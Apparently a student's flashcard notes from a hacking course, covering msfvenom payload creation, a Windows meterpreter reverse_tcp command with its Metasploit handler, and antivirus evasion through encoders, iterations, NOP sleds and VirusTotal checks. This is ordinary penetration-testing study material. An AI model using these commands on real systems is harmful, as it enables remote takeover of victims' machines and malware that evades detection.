Hacking - Section 10 (Gaining Access (Viruses, Trojans, Payloads) )

Question 1

What is the msfvenom tool and how to use it?

Answer 1

A tool to create payloads.
msfvenom + -p + type of payload + LHOST + LPORT + -f + -o
ex - msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST= (kali linux IP) LPORT=5555 -f exe (type of archive) + -o (name + type of archive)

Question 2

How to use the archive created on msfvenom?

Answer 2

Inniciate it on msfconsole:
- use exploit/multi/handler
Change the payload, LHOST and LPORT to match does of the exploit you created.
- set payload + type you created, set LHOST, set LPORT

Question 3

How to check the available formats to an archive?

Answer 3

msfvenom - -list formats

Question 4

What’s the website that tells us about our virus?

Answer 4

Virustotal, it will tell how many antivirus will detect it.

Question 5

How to define the archtecture of the virus?

Answer 5

Use -a + arch when creating it.

ex - LPORT 4444 -a x64

Question 6

What are encoders and how to use them?

Answer 6

A code that can help the virus pass by some antivirus.
msfvenom - -list encoders (to find them)
-e + encoders u copied

Question 7

 What does the -i command do?

Answer 7

It specifies the number of interations that will encode the payload.
The bigger the number the bigger the size, but it’ll become less detectable.
ex - -i 15

Question 8

What does the - -platform command do?

Answer 8

Defines the platform that the payload will operate.

ex: - -platform windows

Question 9

What does the -n command do?

Answer 9

Prepend a nopsled of size on to the payload.
nopsled - a instructions for the processor to not do anything.
ex - -n 500